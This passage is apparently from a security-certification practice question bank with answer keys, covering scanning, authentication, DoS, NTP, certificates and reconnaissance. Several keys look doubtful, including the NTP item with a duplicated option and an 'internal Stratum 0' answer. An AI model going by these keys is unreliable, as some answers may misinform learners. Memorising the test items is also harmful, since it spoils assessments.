Aggressive scan
Passive scan
Non-credentialed scan
Compliance scan
Passive Scan
A forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the
following SAN features might have caused the problem?
Storage multipaths
Deduplication
iSCSI initiator encryption
Data snapshots
Deduplication
Hacktivists are most commonly motivated by:
curiosity
notoriety
financial gain
political cause
political cause
Which of the following can occur when a scanning tool cannot authenticate to a server and has to rely on
limited information obtained from service banners?
False positive
Passive reconnaissance
Access violation
Privilege escalation
False positive
An organization plans to implement multifactor authentication techniques within the enterprise network architecture. Each authentication factor is expected to be a unique control. Which of the following BEST describes the proper employment of multifactor authentication?
Proximity card, fingerprint scanner, PIN
Fingerprint scanner, voice recognition, proximity card
Smart card, user PKI certificate, privileged user certificate
Voice recognition, smart card, proximity card
Proximity card, fingerprint scanner, PIN
When considering IoT systems, which of the following represents the GREATEST ongoing risk after a
vulnerability has been discovered?
Difficult-to-update firmware
Tight integration to existing systems
IP address exhaustion
Not using industry standards
Tight integration to existing systems
A bank is experiencing a DoS attack against an application designed to handle 500 IP-based sessions. in addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent a DoS attacks in the future?
Deploy multiple web servers and implement a load balancer
Increase the capacity of the perimeter router to 10 Gbps
Install a firewall at the network to prevent all attacks
Use redundancy across all network devices and services
Use redundancy across all network devices and services
A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices?
Install a corporately monitored mobile antivirus on the devices.
Prevent the installation of applications from a third-party application store.
Build a custom ROM that can prevent jailbreaking.
Require applications to be digitally signed.
Require applications to be digitally signed.
Upon entering an incorrect password, the logon screen displays a message informing the user that the
password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices?
Input validation
Error handling
Obfuscation
Data exposure
Error handling
Due to regulatory requirements, server in a global organization must use time synchronization. Which of the following represents the MOST secure method of time synchronization?
The server should connect to external Stratum 0 NTP servers for synchronization
The server should connect to internal Stratum 0 NTP servers for synchronization
The server should connect to external Stratum 1 NTP servers for synchronization
The server should connect to external Stratum 1 NTP servers for synchronization
The server should connect to internal Stratum 0 NTP servers for synchronization
A company has critical systems that are hosted on an end-of-life OS. To maintain operations and mitigate
potential vulnerabilities, which of the following BEST accomplishes this objective?
Use application whitelisting.
Employ patch management.
Disable the default administrator account.
Implement full-disk encryption.
Use application whitelisting
A systems administrator is configuring a new network switch for TACACS+ management and authentication.
Which of the following must be configured to provide authentication between the switch and the TACACS+
server?
802.1X SSH Shared secret SNMPv3 CHAP
Shared secret
A security engineer wants to add SSL to the public web server. Which of the following would be the FIRST
step to implement the SSL certificate?
Download the web certificate
Install the intermediate certificate
Generate a CSR
Encrypt the private key
Generate a CSR
During a lessons learned meeting regarding a previous incident, the security team receives a follow-up action item with the following requirements:
Allow authentication from within the United States anytime
Allow authentication if the user is accessing email or a shared file system
Do not allow authentication if the AV program is two days out of date
Do not allow authentication if the location of the device is in two specific countries
Given the requirements, which of the following mobile deployment authentication types is being utilized?
Geofencing authentication
Two-factor authentication
Context-aware authentication
Biometric authentication
Context-aware authentication
A procedure differs from a policy in that it:
is a high-level statement regarding the company’s position on a topic.
sets a minimum expected baseline of behavior.
provides step-by-step instructions for performing a task.
describes adverse actions when violations occur.
Provides step by step instructions for performing a task
Which of the following is being used when a malicious actor searches various social media websites to find
information about a company’s system administrators and help desk staff?
Passive reconnaissance
Initial exploitation
Vulnerability scanning
Social engineering
Passive reconnaissance
A security analyst is performing a manual audit of captured data from a packet analyzer. The analyst looks forbase64 encoded strings and applies the filter http.authbasic. Which of the following describes what theanalysts looking for?
Unauthorized software
Unencrypted credentials
SSL certificate issues
Authentication tokens
Unencrypted credentials
A security administrator learns that PII, which was gathered by the organization, has been found in an open forum. As a result, several C-level executives found their identities were compromised, and they were victims of a recent whaling attack.
Which of the following would prevent these problems in the future? (Select TWO).
Implement a reverse proxy. Implement an email DLP. Implement a spam filter. Implement a host-based firewall. Implement a HIDS.
Implement an email DLP
and
Implement a spam filter
A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in
their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details:
Certificate 1 Certificate Path: Geotrust Global CA *company.com Certificate 2 Certificate Path: *company.com Which of the following would resolve the problem?
Use a wildcard certificate.
Use certificate chaining.
Use a trust model.
Use an extended validation certificate.
Use certificate chaining